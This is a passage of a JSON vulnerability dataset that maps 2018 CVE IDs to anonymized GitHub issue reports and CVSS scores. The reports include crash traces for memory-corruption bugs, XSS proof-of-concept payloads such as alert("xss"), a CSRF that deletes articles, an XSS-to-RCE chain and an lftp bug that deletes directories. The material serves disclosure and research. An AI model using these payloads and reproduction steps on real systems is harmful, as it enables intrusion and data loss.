  18742. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
  18743. "severity": "MEDIUM",
  18744. "baseScore": 5.4,
  18745. "impactScore": 2.5,
  18746. "exploitabilityScore": 2.8
  18747. },
  18748. {
  18749. "CVE_ID": "CVE-2018-10677",
  18750. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/1",
  18751. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/1",
  18752. "Repo_new": "miniupnp/ngiflib",
  18753. "Issue_Created_At": "2018-05-01T17:01:24Z",
  18754. "description": "heap buffer overflow in APITAG ASAN Report: ERRORTAG Command: APITAG Test File: FILETAG Thanks",
  18755. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18756. "severity": "HIGH",
  18757. "baseScore": 8.8,
  18758. "impactScore": 5.9,
  18759. "exploitabilityScore": 2.8
  18760. },
  18761. {
  18762. "CVE_ID": "CVE-2018-10680",
  18763. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/205",
  18764. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/205",
  18765. "Repo_new": "zblogcn/zblogphp",
  18766. "Issue_Created_At": "2019-02-15T14:11:50Z",
  18767. "description": "The List of fake or duplicated security vulnerabilities we declined to accept in NUMBERTAG Still active Duplicate CVETAG Author: MENTIONTAG Detail: CVETAG Duplicated with CVETAG . We fixed them after CVETAG confirmed. See: URLTAG CVETAG Author: MENTIONTAG Detail: CVETAG As same as CVETAG and CVETAG . We decline to accept it as a valid issue. If you get the admin privilege, we have so many self xss ways. Fake CVETAG Author: MENTIONTAG Detail: URLTAG It's fake. We have no dynamic including. No one can run PHP by uploading an image in current version. By the way, it needs authentication. Updated status CVETAG Author: MENTIONTAG Detail: URLTAG We declined to accept a self xss with admin privilege. CVETAG Author: MENTIONTAG Detail: URLTAG We declined to accept a self xss with admin privilege. CVETAG Author: MENTIONTAG Detail: URLTAG It's a joke. I laughed.",
  18768. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18769. "severity": "MEDIUM",
  18770. "baseScore": 6.1,
  18771. "impactScore": 2.7,
  18772. "exploitabilityScore": 2.8
  18773. },
  18774. {
  18775. "CVE_ID": "CVE-2018-10680",
  18776. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/185",
  18777. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/185",
  18778. "Repo_new": "zblogcn/zblogphp",
  18779. "Issue_Created_At": "2018-05-02T13:22:41Z",
  18780. "description": "Z Blog php has a stored Cross Site Scripting Vulnerability. Z Blog php has a stored Cross Site Scripting Vulnerability I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a FILETAG Web site settings > Basic setting > Website title APITAG APITAG save it. exp POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: timezone NUMBERTAG username=admin; APITAG addinfotestzblogphp APITAG APITAG artshu NUMBERTAG APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG FILETAG APITAG APITAG Affected Version NUMBERTAG",
  18781. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18782. "severity": "MEDIUM",
  18783. "baseScore": 6.1,
  18784. "impactScore": 2.7,
  18785. "exploitabilityScore": 2.8
  18786. },
  18787. {
  18788. "CVE_ID": "CVE-2018-10685",
  18789. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/95",
  18790. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/95",
  18791. "Repo_new": "ckolivas/lrzip",
  18792. "Issue_Created_At": "2018-05-02T20:28:01Z",
  18793. "description": "use after free in lzma_decompress_buf (src/stream.c). On latest version NUMBERTAG and master branch APITAG of lrzip, there is a heap use after free in lzma_decompress_buf function of (src/stream.c), which could be triggered by the POC below. The issue is similar to issue NUMBERTAG but happens in a different function. Triggering of this issue could be tricky: when running on a high performance server, most likely we fail to reproduce; however, when running lrzip on a desktop with all cpu cores busy, we could reproduce in some cases NUMBERTAG To reproduce this issue, run the command multiple times: PATHTAG t $POC The detailed backtrace is as follows NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG f2c2 bp NUMBERTAG fd0d3f NUMBERTAG c NUMBERTAG sp NUMBERTAG fd0d3f NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f2c1 in lzma_decompress_buf PATHTAG NUMBERTAG f2c1 in ucompthread PATHTAG NUMBERTAG fd1cb1da6b9 in start_thread ( PATHTAG NUMBERTAG fd1ca9f NUMBERTAG c in clone ( PATHTAG NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
  18794. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18795. "severity": "CRITICAL",
  18796. "baseScore": 9.8,
  18797. "impactScore": 5.9,
  18798. "exploitabilityScore": 3.9
  18799. },
  18800. {
  18801. "CVE_ID": "CVE-2018-10686",
  18802. "Issue_Url_old": "https://github.com/serghey-rodin/vesta/issues/1558",
  18803. "Issue_Url_new": "https://github.com/serghey-rodin/vesta/issues/1558",
  18804. "Repo_new": "serghey-rodin/vesta",
  18805. "Issue_Created_At": "2018-05-04T11:04:26Z",
  18806. "description": "Vesta CP NUMBERTAG rXSS to\u00a0RCE. Hi, there is a reflected XSS on FILETAG line NUMBERTAG path. The issue can be used to upload a PHP file, hence gaining RCE. Despite during a \"normal\" file upload FILETAG calls _\"v copy fs file\"_ (line NUMBERTAG and URLTAG controls that the destination path is in /tmp or PATHTAG an attacker could upload an existing file, this way triggering APITAG (line NUMBERTAG and gaining the ability to write wherever PHP can.",
  18807. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18808. "severity": "MEDIUM",
  18809. "baseScore": 6.1,
  18810. "impactScore": 2.7,
  18811. "exploitabilityScore": 2.8
  18812. },
  18813. {
  18814. "CVE_ID": "CVE-2018-10717",
  18815. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/3",
  18816. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/3",
  18817. "Repo_new": "miniupnp/ngiflib",
  18818. "Issue_Created_At": "2018-05-03T14:45:19Z",
  18819. "description": "Security Issue: Buffer / Heap Overflow. MENTIONTAG APITAG There's an buffer overflow found in ngiflib.c in line NUMBERTAG Size of tocopy exceeded the pixels size and when copying into context >frbuff_p.p8 it overflow here. Proof of ASAN output: PATHTAG APITAG PATHTAG GIF NUMBERTAG a NUMBERTAG bits NUMBERTAG couleurs bg NUMBERTAG BLOCK SIGNATURE NUMBERTAG extension (id NUMBERTAG fe) Comment extension APITAG : Multi image GIF NUMBERTAG a created with APITAG Tools : APITAG BLOCK SIGNATURE NUMBERTAG extension (id NUMBERTAG f9) disposal_method NUMBERTAG delay_time NUMBERTAG APITAG BLOCK SIGNATURE NUMBERTAG C ',' img pos NUMBERTAG size NUMBERTAG palbits NUMBERTAG imgbits NUMBERTAG ncolors NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG fe NUMBERTAG at pc NUMBERTAG fc5dfe NUMBERTAG bp NUMBERTAG ffd NUMBERTAG sp NUMBERTAG ffd NUMBERTAG f NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG fe NUMBERTAG thread T NUMBERTAG fc5dfe NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG bb4b in memcpy PATHTAG NUMBERTAG bb4b in APITAG PATHTAG NUMBERTAG bb4b in APITAG PATHTAG NUMBERTAG cc3 in APITAG PATHTAG NUMBERTAG ERRORTAG d5f in APITAG PATHTAG NUMBERTAG fa7 in main PATHTAG NUMBERTAG fc5df NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG fe NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fc5dfe NUMBERTAG in malloc ( PATHTAG NUMBERTAG b in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9f NUMBERTAG c NUMBERTAG fff9f NUMBERTAG c NUMBERTAG fff9f NUMBERTAG c NUMBERTAG fff9fa NUMBERTAG c NUMBERTAG fff9fb NUMBERTAG c NUMBERTAG fff9fc0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING Affected code: static void APITAG ngiflib_img i, struct ngiflib_decode_context context, const u8 pixels, u NUMBERTAG n) { u NUMBERTAG tocopy; struct ngiflib_gif p = i >parent; while(n NUMBERTAG tocopy = (context APITAG < n) ? context APITAG : n; if(!i APITAG { ifndef NGIFLIB_INDEXED_ONLY if(p >mode & NGIFLIB_MODE_INDEXED) { endif / NGIFLIB_INDEXED_ONLY / ngiflib_memcpy(context >frbuff_p.p8, pixels, tocopy); // crash happened here pixels += tocopy;",
  18820. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18821. "severity": "HIGH",
  18822. "baseScore": 8.8,
  18823. "impactScore": 5.9,
  18824. "exploitabilityScore": 2.8
  18825. },
  18826. {
  18827. "CVE_ID": "CVE-2018-10726",
  18828. "Issue_Url_old": "https://github.com/datenstrom/yellow/issues/321",
  18829. "Issue_Url_new": "https://github.com/datenstrom/yellow/issues/321",
  18830. "Repo_new": "datenstrom/yellow",
  18831. "Issue_Created_At": "2018-05-04T08:56:42Z",
  18832. "description": "There is a stored XSS vulnerability. A stored XSS vulnerability was found in Datenstrom Yellow NUMBERTAG When the users open the Edit page webpage, they can inject the XSS code to the system. POC: Inject the XSS payload: APITAG alert(\"xss\") APITAG FILETAG FILETAG",
  18833. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18834. "severity": "MEDIUM",
  18835. "baseScore": 5.4,
  18836. "impactScore": 2.7,
  18837. "exploitabilityScore": 2.3
  18838. },
  18839. {
  18840. "CVE_ID": "CVE-2018-10727",
  18841. "Issue_Url_old": "https://github.com/Fabrik/fabrik/issues/2033",
  18842. "Issue_Url_new": "https://github.com/fabrik/fabrik/issues/2033",
  18843. "Repo_new": "fabrik/fabrik",
  18844. "Issue_Created_At": "2018-05-04T10:50:54Z",
  18845. "description": "Reflected Cross Site Scripting (XSS) vulnerability in fabrik_referrer. Issue description A reflected Cross Site Scripting (XSS) vulnerability in APITAG hidden input field in fabrik forms allows remote attackers to inject arbitrary scripts via the unsanitized HTTP Referrer header. Example Given a fabrik form URL, for example APITAG that contains an input field such as APITAG , it is possible to reproduce the vulnerability by changing the referrer, for example with APITAG . This may be possible via the following cURL command: APITAG Credits Danilo Cianciulli Paolo Di Notte : Koine Srl",
  18846. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18847. "severity": "MEDIUM",
  18848. "baseScore": 6.1,
  18849. "impactScore": 2.7,
  18850. "exploitabilityScore": 2.8
  18851. },
  18852. {
  18853. "CVE_ID": "CVE-2018-10753",
  18854. "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/16",
  18855. "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/16",
  18856. "Repo_new": "lewdlime/abcm2ps",
  18857. "Issue_Created_At": "2018-04-13T09:40:26Z",
  18858. "description": "stack buffer overflow APITAG in delayed_output(float indent). URLTAG (gdb) set args POC (gdb) r abcm2ps NUMBERTAG File POC POC NUMBERTAG error: Bad character NUMBERTAG d\u00ff&e,d_d&dd\u00aaB NUMBERTAG POC NUMBERTAG error: Bad character NUMBERTAG d\u00ff&e,d_d&dd\u00aaB NUMBERTAG POC NUMBERTAG error: Wrong duration in voice overlay POC NUMBERTAG error: Bad character 'k' POC NUMBERTAG error: Note too much dotted POC NUMBERTAG error: Bad character 'N' POC NUMBERTAG error: Bad character 'N' POC NUMBERTAG error: Wrong duration in voice overlay POC NUMBERTAG error: No note in voice overlay POC NUMBERTAG error: Bad character 'K' POC NUMBERTAG error: Bad character 't' POC NUMBERTAG error: Wrong duration in voice overlay POC NUMBERTAG error: !slide! must be on a note or a rest POC NUMBERTAG warning: Line underfull NUMBERTAG pt of NUMBERTAG pt) Program received signal SIGSEGV, Segmentation fault. __GI_getenv (name NUMBERTAG ffff6a NUMBERTAG b8e \"BC_FATAL_STDERR_\", name APITAG \"LIBC_FATAL_STDERR_\") at APITAG NUMBERTAG getenv.c: No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG c NUMBERTAG d in __GI_getenv (name NUMBERTAG ffff6a NUMBERTAG b8e \"BC_FATAL_STDERR_\", name APITAG \"LIBC_FATAL_STDERR_\") at APITAG NUMBERTAG ffff NUMBERTAG c0f NUMBERTAG in __GI___libc_secure_getenv APITAG \"LIBC_FATAL_STDERR_\") at secure APITAG NUMBERTAG ffff NUMBERTAG fe NUMBERTAG a in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG c in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"stack smashing detected\") at APITAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG in __stack_chk_fail () at APITAG NUMBERTAG f NUMBERTAG in delayed_output (indent=<optimized out>) at APITAG",
  18859. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18860. "severity": "CRITICAL",
  18861. "baseScore": 9.8,
  18862. "impactScore": 5.9,
  18863. "exploitabilityScore": 3.9
  18864. },
  18865. {
  18866. "CVE_ID": "CVE-2018-10758",
  18867. "Issue_Url_old": "https://github.com/datenstrom/yellow/issues/322",
  18868. "Issue_Url_new": "https://github.com/datenstrom/yellow/issues/322",
  18869. "Repo_new": "datenstrom/yellow",
  18870. "Issue_Created_At": "2018-05-05T02:04:03Z",
  18871. "description": "There is a CSRF vulnerability that can delete the users' articles. When the users login in, open the following one page. POC: APITAG delete users' articles ERRORTAG",
  18872. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  18873. "severity": "MEDIUM",
  18874. "baseScore": 6.5,
  18875. "impactScore": 3.6,
  18876. "exploitabilityScore": 2.8
  18877. },
  18878. {
  18879. "CVE_ID": "CVE-2018-10771",
  18880. "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/17",
  18881. "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/17",
  18882. "Repo_new": "lewdlime/abcm2ps",
  18883. "Issue_Created_At": "2018-04-13T13:36:30Z",
  18884. "description": "stack buffer overflow APITAG in get_key(struct SYMBOL s). URLTAG (gdb) set args POC2 (gdb) r Starting program: PATHTAG POC2 APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG abcm2ps NUMBERTAG File POC2 POC NUMBERTAG error: Bad character NUMBERTAG POC NUMBERTAG error: Bad character NUMBERTAG stack smashing detected : PATHTAG terminated Program received signal SIGABRT, Aborted NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG be NUMBERTAG a in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG fe7ea in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG c in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"stack smashing detected\") at APITAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG in __stack_chk_fail () at APITAG NUMBERTAG f NUMBERTAG in get_key (s=s APITAG at APITAG NUMBERTAG c8 in get_info (s=s APITAG at APITAG NUMBERTAG in do_tune () at APITAG NUMBERTAG in abc_eof () at APITAG NUMBERTAG e NUMBERTAG e9 in frontend (s=<optimized out>, s APITAG PATHTAG (C&C NUMBERTAG ZV PATHTAG ftype=ftype APITAG fname=fname APITAG \"POC2\", linenum NUMBERTAG linenum APITAG at APITAG NUMBERTAG b NUMBERTAG d in treat_file (fn=<optimized out>, ext=<optimized out>) at APITAG NUMBERTAG f9 in main (argc NUMBERTAG argv=<optimized out>) at APITAG",
  18885. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18886. "severity": "CRITICAL",
  18887. "baseScore": 9.8,
  18888. "impactScore": 5.9,
  18889. "exploitabilityScore": 3.9
  18890. },
  18891. {
  18892. "CVE_ID": "CVE-2018-10790",
  18893. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/390",
  18894. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/390",
  18895. "Repo_new": "axiomatic-systems/bento4",
  18896. "Issue_Created_At": "2019-04-26T13:44:32Z",
  18897. "description": "Integer overflow at PATHTAG and buffer overflow at PATHTAG cmd: APITAG poc can download here URLTAG version: master head vuln type: integer and buffer overflow There is an integer overflow at APITAG , which then causes an buffer overflow read bugs at APITAG . ERRORTAG The following is the debug process. Integer overflow: ERRORTAG Buffer overflow crash ERRORTAG",
  18898. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  18899. "severity": "HIGH",
  18900. "baseScore": 7.5,
  18901. "impactScore": 3.6,
  18902. "exploitabilityScore": 3.9
  18903. },
  18904. {
  18905. "CVE_ID": "CVE-2018-10804",
  18906. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1053",
  18907. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1053",
  18908. "Repo_new": "imagemagick/imagemagick",
  18909. "Issue_Created_At": "2018-03-24T16:33:01Z",
  18910. "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
  18911. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  18912. "severity": "MEDIUM",
  18913. "baseScore": 6.5,
  18914. "impactScore": 3.6,
  18915. "exploitabilityScore": 2.8
  18916. },
  18917. {
  18918. "CVE_ID": "CVE-2018-10805",
  18919. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1054",
  18920. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1054",
  18921. "Repo_new": "imagemagick/imagemagick",
  18922. "Issue_Created_At": "2018-03-24T16:33:23Z",
  18923. "description": "Memory leak in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
  18924. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  18925. "severity": "MEDIUM",
  18926. "baseScore": 6.5,
  18927. "impactScore": 3.6,
  18928. "exploitabilityScore": 2.8
  18929. },
  18930. {
  18931. "CVE_ID": "CVE-2018-10806",
  18932. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/10",
  18933. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/10",
  18934. "Repo_new": "philippe/frogcms",
  18935. "Issue_Created_At": "2018-05-07T02:55:10Z",
  18936. "description": "Frog CMS NUMBERTAG has a reflected Cross Site Scripting Vulnerability. I have found a reflected Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a URLTAG In the document management office, create new directory test1: Files >test1 APITAG APITAG Modify the directory test1 name\uff0cadding a payload at the directory causes directory errors to trigger cross site scripting\u3002 i think you can see the following picture to konw more. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  18937. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18938. "severity": "MEDIUM",
  18939. "baseScore": 5.4,
  18940. "impactScore": 2.7,
  18941. "exploitabilityScore": 2.3
  18942. },
  18943. {
  18944. "CVE_ID": "CVE-2018-10821",
  18945. "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/384",
  18946. "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/384",
  18947. "Repo_new": "blackcatdevelopment/blackcatcms",
  18948. "Issue_Created_At": "2018-05-05T18:16:01Z",
  18949. "description": "Cross Site Scripting APITAG XSS) Vulnerability in blackcatcms NUMBERTAG Hi, I found a Cross site Scripting APITAG XSS) in blackcatcms NUMBERTAG Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user\u2019s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. Reflected XSS Attacks Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e mail message, or on some other web site. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user\u2019s browser. The browser then executes the code because it came from a \"trusted\" server. Reflected XSS is also sometimes referred to as Non Persistent or Type II XSS. Vulnerability Name: Cross Site Scripting APITAG XSS) Vulnerable URL: URLTAG Steps to Reproduce: Step NUMBERTAG Logged In as a Admin Role Step NUMBERTAG On Search panel with APITAG \"> APITAG Step NUMBERTAG It will store the search content as javascript code and it will execute cross site scripting. Vulnerable field is search panel. FILETAG Additional information >blackcatcms NUMBERTAG DB type and version: APITAG NUMBERTAG APITAG >HTTP server type and version: APITAG",
  18950. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18951. "severity": "MEDIUM",
  18952. "baseScore": 4.8,
  18953. "impactScore": 2.7,
  18954. "exploitabilityScore": 1.7
  18955. },
  18956. {
  18957. "CVE_ID": "CVE-2018-10827",
  18958. "Issue_Url_old": "https://github.com/litecart/litecart/issues/119",
  18959. "Issue_Url_new": "https://github.com/litecart/litecart/issues/119",
  18960. "Repo_new": "litecart/litecart",
  18961. "Issue_Created_At": "2018-05-06T21:09:47Z",
  18962. "description": "DOS Vulnerability through APITAG Hi, I found a DOS Vulnerability in litecart. If an attacker sends random URL's to APITAG those URLs (if unique) are saved to the file APITAG Unfortunatly this file is fully loaded to RAM if a not existing URL is called. By sending a large number of invalid request to litecart, the file size can be increased infinite. Then every call to litecart, that has an invalid url takes the full available memory and causes a lot of IO. Recommendations The entries should be logged to dababase. An upsert command can be used to create or update the entries in the db. How can you protect your system, until a bugfix is published? E.g. create a cron that empties the not_found.log file. Best Regards mschop",
  18963. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  18964. "severity": "HIGH",
  18965. "baseScore": 7.5,
  18966. "impactScore": 3.6,
  18967. "exploitabilityScore": 3.9
  18968. },
  18969. {
  18970. "CVE_ID": "CVE-2018-10916",
  18971. "Issue_Url_old": "https://github.com/lavv17/lftp/issues/452",
  18972. "Issue_Url_new": "https://github.com/lavv17/lftp/issues/452",
  18973. "Repo_new": "lavv17/lftp",
  18974. "Issue_Created_At": "2018-05-16T14:09:53Z",
  18975. "description": "Exploit in reverse mirror job deletes cwd on source. Warning: This will delete local content on the server you are running the commands from NUMBERTAG Create a directory called APITAG on any FTP server NUMBERTAG Run an lftp reverse mirror command with APITAG towards this server, where APITAG does not exist on the local source NUMBERTAG Watch as lftp deletes the cwd on the sourceserver. If you run the lftp command in APITAG as root , that means the entire server will be wiped. Script to reproduce: ERRORTAG From log: CODETAG Clearly arguments passed to APITAG are not escaped correctly, leaving it open to injection LFTP NUMBERTAG Libraries used: Expat NUMBERTAG APITAG NUMBERTAG idn NUMBERTAG Readline NUMBERTAG zlib NUMBERTAG",
  18976. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  18977. "severity": "MEDIUM",
  18978. "baseScore": 6.5,
  18979. "impactScore": 3.6,
  18980. "exploitabilityScore": 2.8
  18981. },
  18982. {
  18983. "CVE_ID": "CVE-2018-10921",
  18984. "Issue_Url_old": "https://github.com/hisdeedsaredust/ttembed/issues/3",
  18985. "Issue_Url_new": "https://github.com/hisdeedsaredust/ttembed/issues/3",
  18986. "Repo_new": "hisdeedsaredust/ttembed",
  18987. "Issue_Created_At": "2018-08-02T15:39:23Z",
  18988. "description": "CVETAG Failure to Check File Bounds May Lead to Input File Corruption. Certain input files may trigger an integer overflow in ttembed input file processing. This overflow could potentially lead to corruption of the input file due to a lack of checking return codes of fgetc/fputc function calls. ttembed fails to check the return of fgetc for failures which can lead to output file corruption. Note the following: ERRORTAG readbe NUMBERTAG should be checking for EOF. The application fails to verify that reads will succeed via ensuring minimum file lengths. Instead, it blindly reads and fails to check that EOF is not returned. As such, large negative values are returned by readbe NUMBERTAG One obvious case occurs on line NUMBERTAG where fstype is set to the output of readbe NUMBERTAG If no more bytes can be read from the file handle, readbe NUMBERTAG will return NUMBERTAG A fseek on line NUMBERTAG adds NUMBERTAG to NUMBERTAG which wraps around to an fseek of NUMBERTAG which is valid. This later leads to incorrect writes and \"corruption\" of the input file. All usages of fgetc should be checked else file bounds should be verified before fseeks/fgetcs are called. The security implications of this seem rather unimportant as an attacker submitted a corrupted file and the server further corrupting it seems rather obtuse, but perhaps some consumer downstream of ttembed may rely on correct files being output. Nevertheless, ttembed should still terminate early in this case before writing. Reproducer attached. Copy modify.ttf to APITAG run ttembed on APITAG then diff the file and the bak. They will be different. FILETAG This has been assigned CVETAG Thank you!",
  18989. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  18990. "severity": "HIGH",
  18991. "baseScore": 7.5,
  18992. "impactScore": 3.6,
  18993. "exploitabilityScore": 3.9
  18994. },
  18995. {
  18996. "CVE_ID": "CVE-2018-10922",
  18997. "Issue_Url_old": "https://github.com/hisdeedsaredust/ttembed/issues/2",
  18998. "Issue_Url_new": "https://github.com/hisdeedsaredust/ttembed/issues/2",
  18999. "Repo_new": "hisdeedsaredust/ttembed",
  19000. "Issue_Created_At": "2018-08-02T15:19:54Z",
  19001. "description": "CVETAG : Use of Untrusted Length Field May Lead to Denial of Service. Hi, If a large length NUMBERTAG fffffff) is parsed by ttembed, the following loop will run for quite a long time causing a denial of service: APITAG As readbe NUMBERTAG calls fgetc four times, this results in roughly NUMBERTAG calls to fgetc. On my computer, it takes ttembed around NUMBERTAG minutes to finish looping. APITAG Instead of looping forever, the code should fail as soon as readbe NUMBERTAG detects an EOF, else, the program should verify the bounds of the program and bail out when size > actual size of the file. This has been assigned CVETAG . Reproducer attached. FILETAG",
  19002. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19003. "severity": "MEDIUM",
  19004. "baseScore": 5.5,
  19005. "impactScore": 3.6,
  19006. "exploitabilityScore": 1.8
  19007. },
  19008. {
